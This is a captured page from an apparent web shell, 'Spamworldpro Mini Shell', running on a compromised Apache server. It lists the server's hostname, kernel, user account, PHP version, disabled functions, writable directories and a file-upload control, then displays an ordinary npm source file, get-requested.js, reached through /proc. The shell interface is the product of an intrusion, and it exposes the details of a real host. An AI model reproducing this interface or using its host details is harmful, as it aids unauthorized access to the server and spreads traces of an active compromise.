Spamworldpro Mini Shell
Spamworldpro


Server : Apache
System : Linux server2.corals.io 4.18.0-348.2.1.el8_5.x86_64 #1 SMP Mon Nov 15 09:17:08 EST 2021 x86_64
User : corals ( 1002)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /proc/thread-self/root/opt/cpanel/ea-nodejs10/lib/node_modules/npm/lib/install/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : //proc/thread-self/root/opt/cpanel/ea-nodejs10/lib/node_modules/npm/lib/install/get-requested.js
'use strict'
const npa = require('npm-package-arg')
const moduleName = require('../utils/module-name.js')
const packageRelativePath = require('./deps').packageRelativePath
module.exports = function (child, reqBy) {
  if (!child.requiredBy.length) return
  if (!reqBy) reqBy = child.requiredBy[0]
  const deps = reqBy.package.dependencies || {}
  const devDeps = reqBy.package.devDependencies || {}
  const optDeps = reqBy.package.optionalDependencies || {}
  const name = moduleName(child)
  const spec = deps[name] || devDeps[name] || optDeps[name]
  const where = packageRelativePath(reqBy)
  return npa.resolve(name, spec, where)
}

Spamworldpro Mini